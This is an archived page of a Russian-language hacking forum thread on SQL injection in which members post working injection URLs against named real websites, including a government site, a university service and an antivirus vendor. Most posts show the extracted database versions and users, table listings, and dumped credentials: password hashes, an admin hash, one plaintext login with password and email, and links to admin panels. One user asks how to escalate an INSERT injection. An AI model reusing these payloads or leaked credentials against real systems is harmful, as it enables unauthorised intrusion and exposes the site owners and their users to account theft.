HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу SQL Инъекции
   
Ответ
Страница 452 из 1602 « Первая < 352402442 448 449 450 451 452 453 454 455 456 4625025529521452 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 28.01.2008, 14:08
fRg
Участник форума
Регистрация: 28.12.2006
Сообщений: 111
Провел на форуме:
500695

Репутация: 524
Отправить сообщение для fRg с помощью ICQ
По умолчанию
galaxynet.com
Код:
http://www.galaxynet.com/default.php?id=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4/*
4.1.20:galaxynet-website:root@localhost
Код:
http://www.galaxynet.com/default.php?id=-1+union+select+1,concat_ws(0x3a,user,password),3,4+from+mysql.user/*
Логин : MySQL(pass) :
Код:
root : 3a84bc4e4c3193e1
cpia.ca
Код:
http://www.cpia.ca/topics/default.php?ID=-1+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11,12,13,14,15,16/*
4.0.27-debug-log:main_cpia_ca:cpiaca4736878645@web173.megawebse rvers.com

sczg.hr - Studentski Centar u Zagrebu - Sveučilište u Zagrebu
Код:
http://www.sczg.hr/default.php?id=kat&katID=-1/**/union/**/select/**/1,concat_ws(0x3a,version(),database(),user())/*
5.0.32-Debian_7etch1-log:sczg:root@localhost
Код:
http://www.sczg.hr/default.php?id=kat&katID=-1/**/union/**/select/**/1,table_name/**/from/**/information_schema.tables/**/limit/**/101,1/*
Есть табы g2_User , login , db , host , user , но все они из mysql доступ к которой прикрыт
 
Ответить с цитированием

  #2  
Старый 28.01.2008, 15:13
fRg
Участник форума
Регистрация: 28.12.2006
Сообщений: 111
Провел на форуме:
500695

Репутация: 524
Отправить сообщение для fRg с помощью ICQ
По умолчанию
Ещё немного...

NordlandTeater.no
Код:
http://www.nordlandteater.no/default.php?id=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*
4.1.20:norteatret:norteatret@localhost

GriSoft.nl - AVG Antivirus
Код:
http://www.grisoft.nl/grisoft/default.php?id=10&class=&main_id=-1+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8/*
4.1.20 - WideXS:uman:uman@212.204.254.10

Таба users с полями username и password :
Код:
http://www.grisoft.nl/grisoft/default.php?id=10&class=&main_id=-1+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8+from+users/*
 
Ответить с цитированием

  #3  
Старый 28.01.2008, 16:22
Sharingan
Участник форума
Регистрация: 05.05.2007
Сообщений: 171
Провел на форуме:
1050662

Репутация: 435
Отправить сообщение для Sharingan с помощью ICQ
По умолчанию
Крупнейший новостной ресурс, в Мэйл топе 2 место =) незнаю что с него выжать можно даже
Код:
http://www.trud.ru/issue/article.php?id=-1+union+select+1,2,3,4,5,concat(user(),0x3a,version(),0x3a,database()),7,8,9,10,11,12,13,14/*
trudinfo@localhost:4.1.21-log:fox
подбирал названия, ничего, базы юзверей нет...
если кто что, сообщите ...
 
Ответить с цитированием

  #4  
Старый 28.01.2008, 17:56
DJ ][akep
Познающий
Регистрация: 27.01.2008
Сообщений: 57
Провел на форуме:
355954

Репутация: 32
Exclamation
Уже третий или четвёртый раз о trud.ru пишите тему почитайте

P.S. А админка тут http://www.trud.ru/adm/admin.php
Последний раз редактировалось DJ ][akep; 28.01.2008 в 18:05..
 
Ответить с цитированием

  #5  
Старый 28.01.2008, 18:05
A2GIL
Познающий
Регистрация: 31.08.2007
Сообщений: 94
Провел на форуме:
422909

Репутация: 200
Отправить сообщение для A2GIL с помощью ICQ
По умолчанию
Аргентина.......-Россия пять ноль

http://www.riocuarto.gov.ar/area.php?are=33+and+1=2+union+all+select+1,2,3,con cat(user,char(58),password),5,6,7,8,9+from+mysql.u ser/*

Цитата:
root: (без пароля)
nllamosas:*510C4C5FEFE77EE518296F7FFDE8460AEF917B3 9
actualizador:32cab2e5244d5ee0
invitado:37ccf19067b01dd2
pestanguet:*C3905841DE2D2212AB395E17CE17D49A8074BA 99
ingreso:*272BC0F4D07864DBA45F1EB70A8DE7B66701B4BF
mysar: 68cc70f24a0b84af (mysar)
sistemas:65f74a972060f0a9
Жалко нет аргентинского словарика

http://www.3dgames.com.ar/hwreviews.php?Id=33+and+1=2+union+all+select+1,2,3 ,4,5,6,7,8,9,10,11,12,13,14,15,concat(user,char(58 ),password,char(58)),17,18+from+mysql.user+limit+2 ,1/*

root: (без пароля)

http://www.loginstitute.ca/moreinfo.php?id=6+and+1=2+union+select+1,2,table_n ame,4,5,6,7+from+information_schema.tables+limit+2 2,1/*

таблицы следующие:

Цитата:
....
VIEWS
answers1
answers2
answers3
answers4
classroom_settings_tbl
classroom_user_tbl - что-то есть, но она без паролей!
finalanswers
finalexam
finalresults
quiz1
quiz2
quiz3
quiz4
http://www.tgao.ca/page.php?id=9+and+1=2+union+select+1,2,table_name, 4+from+information_schema.tables+limit+25,1/*
 
Ответить с цитированием

  #6  
Старый 28.01.2008, 18:06
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию
http://gubakha.ru/ru/publications/publications/?publication=-1+union+select+1,2,3,4,5,6,concat_ws(0x2F,version( ),database(),user()),8/*

4.0.24_Debian-10sarge2-log/dbgubakha/gubakha@localhost

-----------------------------------------------------------------------------
literia.ru

http://literia.ru/vitrin.php?viewmode=view&id_vitrin=-1+union+select+concat_ws(0x2F,version(),database() ,user()),2/*

4.1.22-standard-log/literia_portal/literia_portal@local


http://literia.ru/vitrin.php?viewmode=view&id_vitrin=-1+union+select+concat_ws(0x2F,login,pwd,email),2+f rom+user+limit+0,1/*

логин/пароль/мейл
Mike/hubabuba/master@literia.ru
 
Ответить с цитированием

  #7  
Старый 28.01.2008, 20:48
chekist
Reservists Of Antichat - Level 6
Регистрация: 14.11.2007
Сообщений: 177
Провел на форуме:
1246854

Репутация: 622
По умолчанию
помогите советом, нашёл скуль заморочный

INSERT INTO jos_gkb_voting_log (type,date,userid,fileid,ipaddress) VALUES (3,789,0,[sql],0x302e302e302e30)
fileid только intger
ipaddress ограничено по длине

можноли в этот запрос поставить insert или update, и как если возможно
 
Ответить с цитированием

  #8  
Старый 28.01.2008, 21:47
fobofob
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
Провел на форуме:
1373642

Репутация: 569
По умолчанию
http://www.trendnet.com/ru/asp/download_manager/list_subcategory.asp?SUBTYPE_ID=1038+or+1=@@versio n--

Microsoft SQL Server 2000 - 8.00.2039 (Intel X86 ) May 3 2005 23 :18 :38 Copyright (c) 1988-2003 Microsoft Corporation Developer Edition on Windows NT 5.2 (Build 3790 : Service Pack 2)

http://www.trendnet.com/ru/asp/download_manager/list_subcategory.asp?SUBTYPE_ID=1038+or+1=(select+ system_user)--

'sqlguest'


http://www.trendnet.com/ru/asp/download_manager/list_subcategory.asp?SUBTYPE_ID=1038+or+1=(select+ db_name())--

'downloads'

больше ничего не получилось
 
Ответить с цитированием

  #9  
Старый 28.01.2008, 22:22
.Begemot.
Участник форума
Регистрация: 27.03.2007
Сообщений: 161
Провел на форуме:
1273248

Репутация: 785
Отправить сообщение для .Begemot. с помощью ICQ
По умолчанию
zmago.com
Код HTML:
http://www.zmago.com/podjetje.php?tema=-4+union+select+0,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),2,3,4,5,6,7,8,9/*
USER:slovino2@localhost
VERSION:5.0.45
DATABASE:slovino2
Код HTML:
http://www.zmago.com/podjetje.php?tema=-4+union+select+0,table_name,2,3,4,5,6,7,8,9+from+information_schem  a.tables/*
- все названия таблиц
Код HTML:
http://www.zmago.com/podjetje.php?tema=-4+union+select+0,column_name,2,3,4,5,6,7,8,9+from+information_sche  ma.columns/*
- все названия столбцов
fxmonitor.ru
Код HTML:
http://fxmonitor.ru/showacc.php?acc=-24+union+select+0,1,2,3,4,concat(USER(),0x3a,VERSION(),0x3a,DATABASE(   )),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/*&user=bf0ab9beec6bacd404743fcfc95dbcb6
USER:whcforex_admin@localhost
VERSION:5.0.45-community-log
DATABASE:whcforex_monitoring
Код HTML:
http://fxmonitor.ru/showacc.php?acc=-24+union+select+0,1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15,16,17,   18,19,20,21,22,23+from+information_schema.tables/*&user=bf0ab9beec6bacd404743fcfc95dbcb6
- все названия таблиц
Код HTML:
http://fxmonitor.ru/showacc.php?acc=-24+union+select+0,1,2,3,4,column_name,6,7,8,9,10,11,12,13,14,15,16,17   ,18,19,20,21,22,23+from+information_schema.columns/*&user=bf0ab9beec6bacd404743fcfc95dbcb6
- все названия столбцов
arbat-voyage.com
Код HTML:
http://arbat-voyage.com/hotel.php?m=-188+union+select+0,concat(USER(),0x3a,VERSION(),0x3a,DATABASE())/*
USER:us1126b@localhost
VERSION:4.1.22
DATABASE:db1126b
 
Ответить с цитированием

  #10  
Старый 28.01.2008, 22:21
159932
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038

Репутация: 1385


По умолчанию
www.mosparohodstvo.ru
Цитата:
http://www.mosparohodstvo.ru/?pid=4&type=-3+union+select+1,2,3,4,concat(login,0x3a,password) ,6,7,8,9,0,1,2+from+fva_auth/*
5.0.45-log
admin:762d97b11b532702
http://www.mosparohodstvo.ru/adm/
 
Ответить с цитированием
Ответ
Страница 452 из 1602 « Первая < 352402442 448 449 450 451 452 453 454 455 456 4625025529521452 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ